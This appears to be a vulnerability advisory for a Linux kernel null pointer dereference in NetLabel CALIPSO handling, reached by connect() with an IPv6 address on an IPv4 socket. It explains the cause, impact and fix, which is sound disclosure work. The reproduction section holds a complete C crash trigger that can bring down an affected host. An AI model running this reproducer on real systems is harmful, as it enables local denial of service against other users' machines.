Linux Kernel CALIPSO Null Pointer Dereference Vulnerability with IPv4 Sockets

Vulnerability

A null pointer dereference has been identified in the Linux kernel's NetLabel CALIPSO code when it is invoked for an IPv4 socket. CALIPSO is an IPv6-only labelling option, and the code path ends in 'txopt_get()', which reads the socket's 'ipv6_txoptions' pointer out of the socket's IPv6-specific state. An IPv4 socket has no such state, so the pointer 'txopt_get()' dereferences is NULL. The root cause is a missing check in 'netlbl_conn_setattr()': it chooses the CALIPSO path from the address family of the sockaddr passed to 'connect()' rather than from the family of the socket itself, so the two are never required to match. A local process can therefore reach the fault by calling 'connect()' with an AF_INET6 address on an AF_INET socket, which produces a general protection fault in the kernel.

Impact

Triggering the bug dereferences a NULL pointer in kernel context and produces a general protection fault, which kills the calling task and, depending on the kernel's panic_on_oops setting and what the faulting task held at the time, can bring down the whole host. The demonstrated impact is a local denial of service. Arbitrary code execution has not been shown, and a NULL dereference on a kernel that enforces mmap_min_addr is not by itself a code-execution primitive, so that claim should be treated as unsupported until a write or control-flow primitive is demonstrated.

Reproduction

The fault is triggered by calling 'connect()' on an AF_INET socket with a 'struct sockaddr_in6' whose 'sa_family' is AF_INET6. The bug was found with 'syzkaller', which generates such mismatched system calls automatically, but it can equally be reproduced with a few lines of user-space C. The LSM's socket connect hook runs before the IPv4 protocol handler checks the address family, which is how the IPv6 sockaddr reaches 'netlbl_conn_setattr()' at all; whether the faulting CALIPSO path is then taken depends on the kernel routing the 'connect()' through NetLabel, which in practice requires a NetLabel configuration that labels the socket. On a kernel without that configuration, or one carrying the fix, 'connect()' simply fails, typically with EAFNOSUPPORT from the IPv4 connect handler.
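The request described above, as an added user-space reproducer that is not part of this advisory or of the kernel tree. It assumes only the standard Linux socket headers; the function names 'probe_family_mismatch' and 'mismatch_was_rejected' are the example's own. On an affected kernel that labels the socket through NetLabel, the 'connect()' call is the crash trigger, so run it only in a disposable VM; elsewhere it reports the error the kernel returns for the mismatched family:

```c
/* Added example: user-space reproducer for the CALIPSO family-mismatch bug.
 * Not from the advisory or the kernel tree. It opens an AF_INET socket and
 * calls connect() with a struct sockaddr_in6, the request syzkaller issued.
 * On an affected kernel whose LSM/NetLabel configuration routes the connect
 * through netlbl_conn_setattr() this crashes the kernel (NULL dereference in
 * txopt_get()); on a fixed or unlabelled kernel the IPv4 connect handler
 * rejects the address family, normally with EAFNOSUPPORT.
 * Build: cc -Wall -o calipso_mismatch calipso_mismatch.c */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Build an IPv6 destination (::1, port 1) that is deliberately of the wrong
 * family for an AF_INET socket. Returns the byte length to pass to connect().
 * The address value is irrelevant to the bug; only sin6_family matters. */
static socklen_t build_mismatched_addr(struct sockaddr_in6 *sin6)
{
    memset(sin6, 0, sizeof(*sin6));
    sin6->sin6_family = AF_INET6;
    sin6->sin6_port = htons(1);
    sin6->sin6_addr = in6addr_loopback;
    return sizeof(*sin6);
}

/* Create an IPv4 socket of the given type and connect() it to an IPv6
 * address. Returns 0 if connect() unexpectedly succeeded, the errno of the
 * failed connect() otherwise, or -1 (errno set) if socket() itself failed. */
int probe_family_mismatch(int sock_type)
{
    struct sockaddr_in6 sin6;
    socklen_t len = build_mismatched_addr(&sin6);
    int fd = socket(AF_INET, sock_type, 0);
    if (fd < 0)
        return -1;
    /* security_socket_connect() (the LSM hook) runs before tcp_v4_connect()
     * or ip4_datagram_connect() validate sin_family, so the AF_INET6 sockaddr
     * reaches NetLabel on a kernel that labels this socket. */
    int rc = connect(fd, (struct sockaddr *)&sin6, len);
    int err = rc == 0 ? 0 : errno;
    close(fd);
    return err;
}

/* The result expected from a kernel that does not crash: EAFNOSUPPORT from
 * the IPv4 protocol handler. Any other outcome deserves a closer look. */
int mismatch_was_rejected(int err)
{
    return err == EAFNOSUPPORT;
}

int main(void)
{
    const struct { const char *name; int type; } kinds[] = {
        { "SOCK_STREAM", SOCK_STREAM },
        { "SOCK_DGRAM",  SOCK_DGRAM  },
    };
    for (size_t i = 0; i < sizeof(kinds) / sizeof(kinds[0]); i++) {
        int err = probe_family_mismatch(kinds[i].type);
        if (err == -1) {
            printf("%s: socket() failed: %s\n", kinds[i].name, strerror(errno));
            continue;
        }
        printf("%s: connect(AF_INET socket, AF_INET6 addr) -> %s%s\n",
               kinds[i].name, err ? strerror(err) : "success",
               mismatch_was_rejected(err) ? " (rejected as expected)" : "");
    }
    return 0;
}
```

No privileges are needed; 'connect()' is an ordinary system call, which is why the bug is reachable by any local user on a kernel that labels its sockets. Both a stream and a datagram socket are probed because the IPv4 connect handlers for TCP and UDP differ, while the LSM hook that leads into NetLabel is shared.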

Remediation

The vulnerability has been addressed in the mainline Linux Git repository: 'netlbl_conn_setattr()' now rejects an address whose family does not match the socket's before the CALIPSO code runs, so an AF_INET socket can no longer be steered into the IPv6-only path. Users should upgrade to a kernel release that contains the fix, or to a distribution kernel that has backported it; a kernel with the fix returns an error from the mismatched 'connect()' instead of faulting.

Added: Jul 3, 2025, 10:06 AM
Updated: Jul 3, 2025, 10:06 AM